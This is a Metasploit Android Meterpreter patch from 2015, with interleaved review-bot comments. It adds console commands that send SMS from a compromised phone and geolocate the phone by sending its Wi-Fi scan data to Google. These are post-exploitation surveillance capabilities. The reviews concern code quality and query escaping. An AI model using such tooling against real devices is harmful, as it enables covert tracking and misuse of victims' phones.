From ad86a729187118f2733a23d64d233639ee9ecc7a Mon Sep 17 00:00:00 2001 From: Jack64 Date: Mon, 20 Jul 2015 01:16:58 +0100 Subject: [PATCH] send_sms + wlan_geolocate --- .../meterpreter/extensions/android/android.rb | 38 +++++- .../meterpreter/extensions/android/tlv.rb | 7 ++ .../ui/console/command_dispatcher/android.rb | 109 +++++++++++++++++- 3 files changed, 150 insertions(+), 4 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index e36a27eb31..77d9901efd 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -44,7 +44,7 @@ class Android < Extension def dump_sms sms = Array.new request = Packet.create_request('dump_sms') - response = client.send_request(request) + response = client.send_request(request,60) response.each( TLV_TYPE_SMS_GROUP ) { |p| @@ -64,7 +64,7 @@ class Android < Extension def dump_contacts contacts = Array.new request = Packet.create_request('dump_contacts') - response = client.send_request(request) + response = client.send_request(request,60) response.each( TLV_TYPE_CONTACT_GROUP ) { |p| 
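Review bot: The bare `60` passed as the second argument to `client.send_request` in `dump_sms` is repeated in the `dump_contacts` hunk and again in the new `wlan_geolocate`, with nothing saying what unit it is or why these calls differ from `send_sms`, which keeps the default. A named constant would document it, for example `SLOW_REQUEST_TIMEOUT = 60 # presumably seconds; bulk dumps can outlast the default`, used as `client.send_request(request, SLOW_REQUEST_TIMEOUT)`. Both method bodies continue outside their hunks.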
@@ -119,6 +119,40 @@ class Android < Extension response = client.send_request(request) response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + + def send_sms(dest,body) + request = Packet.create_request('send_sms') + request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest) + request.add_tlv(TLV_TYPE_SMS_BODY,body) + response = client.send_request(request) + resp=response.get_tlv(TLV_TYPE_SMS_SENT).value + return resp + end + + def wlan_geolocate + request = Packet.create_request('wlan_geolocate') + response = client.send_request(request,60) + networks=[] + response.each( TLV_TYPE_WLAN_GROUP ) { |p| + + networks << + { + 'ssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_SSID).value), + 'bssid' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_BSSID).value), + 'level' => client.unicode_filter_encode(p.get_tlv(TLV_TYPE_WLAN_LEVEL).value) + } + + } + return networks +# response.get_tlv(TLV_TYPE_WLAN_STRING).value +# response.each( TLV_TYPE_CONTACT_GROUP ) { |p| +# wifi << { +# 'string' => p.get_tlv(TLV_TYPE_WLAN_STRING).value +# } +# } +# return wifi +# response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 879afbe944..37232b9bbf 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -33,6 +33,13 @@ TLV_TYPE_CHECK_ROOT_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9019) TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020) +TLV_TYPE_SMS_SENT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9021) + +TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022) +TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023) +TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024) +TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025) + end end end 
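Review bot: In `wlan_geolocate` the `'level'` value is run through `client.unicode_filter_encode`, although `TLV_TYPE_WLAN_LEVEL` is declared as `TLV_META_TYPE_UINT` in the tlv.rb hunk, so a text filter is applied to an integer; `'level' => p.get_tlv(TLV_TYPE_WLAN_LEVEL).value` would keep the number as received. If the payload reports signal strength in dBm, which is normally negative, an unsigned TLV will also deliver it as a large positive number, so the type choice is worth confirming against the device side. Both new methods call `.value` directly on `get_tlv(...)`; if that can return nil when a reply lacks the TLV, a malformed response from the device raises NoMethodError here rather than being reported as a failure. The block of commented-out code after `return networks` should be dropped before merge.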
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index a31638bc61..a71addd84a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -26,7 +26,9 @@ class Console::CommandDispatcher::Android 'geolocate' => 'Get current lat-long using geolocation', 'dump_calllog' => 'Get call log', 'check_root' => 'Check if device is rooted', - 'device_shutdown' => 'Shutdown device' + 'device_shutdown' => 'Shutdown device', + 'send_sms' => 'Sends SMS from target session', + 'wlan_geolocate' => 'Get current lat-long using WLAN information', } reqs = { @@ -35,7 +37,9 @@ class Console::CommandDispatcher::Android 'geolocate' => [ 'geolocate' ], 'dump_calllog' => [ 'dump_calllog' ], 'check_root' => [ 'check_root' ], - 'device_shutdown' => [ 'device_shutdown'] + 'device_shutdown' => [ 'device_shutdown'], + 'send_sms' => [ 'send_sms' ], + 'wlan_geolocate' => [ 'wlan_geolocate' ] } # Ensure any requirements of the command are met @@ -343,6 +347,7 @@ class Console::CommandDispatcher::Android end + def cmd_check_root(*args) check_root_opts = Rex::Parser::Arguments.new( 
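Review bot: The help text `'Get current lat-long using WLAN information'` does not say that the command submits the device's Wi-Fi scan to a third-party service, which the `cmd_wlan_geolocate` handler added later in this file does; `'wlan_geolocate' => 'Get current lat-long by sending WLAN scan data to Google'` would tell the operator before they run it. The new last entry of `commands` also ends in a trailing comma while the new last entry of `reqs` does not, so the two should be made consistent. The hunk at -343 only adds a second blank line before `cmd_check_root` and can be dropped. Both hashes start outside their hunks.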
@@ -368,6 +373,106 @@ class Console::CommandDispatcher::Android end end + def cmd_send_sms(*args) + send_sms_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-d' => [ true, 'Destination number' ], + '-t' => [ true, 'SMS body text' ] + ) + dest='' + body='' + send_sms_opts.parse(args) { | opt, idx, val | + case opt + when '-h' + print_line('Usage: send_sms -d -t ') + print_line('Sends SMS messages to specified number.') + print_line(send_sms_opts.usage) + return + when '-d' + dest=val + when '-t' + body=val + end + } + if (dest.blank? or body.blank?) + print_error("You must enter both a destination address -d and the SMS text body -t") + print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."') + print_line(send_sms_opts.usage) + return + end + sent=client.android.send_sms(dest,body) + if (sent) + print_good('SMS sent') + else + print_status('SMS failed to send') + end + end + + def cmd_wlan_geolocate(*args) + + wlan_geolocate_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ] + ) + + wlan_geolocate_opts.parse(args) { | opt, idx, val | + case opt + when '-h' + print_line('Usage: wlan_geolocate') + print_line('Tries to get device geolocation from WLAN information and Google\'s API') + print_line(wlan_geolocate_opts.usage) + return + end + } + + log = client.android.wlan_geolocate + wlan_list='' + log.each{|x| + mac=x['bssid'] + ssid=x['ssid'] + ss=x['level'] + network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}" + wlan_list << network_data +# print_status(x['ssid']+" ("+x['bssid']+") pwr: "+x['level'].to_s()) + } + + if wlan_list.blank? + print_error("Unable to enumerate wireless networks from the target. 
Wireless may not be present or enabled.") + return + end + + # Build and send the request to Google + url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}" + uri = URI.parse(URI.encode(url)) + request = Net::HTTP::Get.new(uri.request_uri) + http = Net::HTTP::new(uri.host,uri.port) + http.use_ssl = true + response = http.request(request) + + # Gather the required information from the response + if response && response.code == '200' + results = JSON.parse(response.body) + latitude = results["location"]["lat"] + longitude = results["location"]["lng"] + accuracy = results["accuracy"] + print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.") + print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}") + else + print_error("Failure connecting to Google for location lookup.") + end + +# print_status(log) +# log.each{|x| +# print_line(x) +# } + #if is_rooted + # print_good('Device is rooted') + #elsif + # print_status('Device is not rooted') + #end + end + + + # # Name for this dispatcher #
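Review bot: The SSID and BSSID strings reported by the device are interpolated into the query string unescaped in `cmd_wlan_geolocate`, and `URI.encode` on the whole URL leaves `&`, `=` and `#` alone, so an access point whose name contains those characters can add or truncate parameters in the request sent to Google. Each value should be escaped on its own with `URI.encode_www_form_component` and the finished URL parsed without a second encoding pass, as in the excerpt below. The `ss=` separator differs from `mac:` and `ssid:` in the same string and looks like a typo for `ss:`; the excerpt leaves it as written. Separately, `http.request` and `JSON.parse` are not wrapped in a `rescue`, and `results["location"]["lat"]` assumes the key exists, so a timeout or an error body from the service surfaces as an unhandled exception instead of reaching the `print_error` path. The trailing commented-out blocks and the unused `idx` block parameter can go.

```ruby
    wlan_list = ''
    log.each { |x|
      # Escape every device-supplied value by itself so that '&', '=', '#' or
      # '|' inside an SSID cannot change the shape of the query string.
      mac  = URI.encode_www_form_component(x['bssid'].to_s)
      ssid = URI.encode_www_form_component(x['ssid'].to_s)
      ss   = URI.encode_www_form_component(x['level'].to_s)
      # %7C is the pre-encoded '|' field separator.
      wlan_list << "&wifi=mac:#{mac}%7Cssid:#{ssid}%7Css=#{ss}"
    }

    # … unchanged: empty wlan_list check …

    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
    # Already escaped above; URI.encode here would double-encode the '%'.
    uri = URI.parse(url)

    # … unchanged: Net::HTTP request and response handling …
```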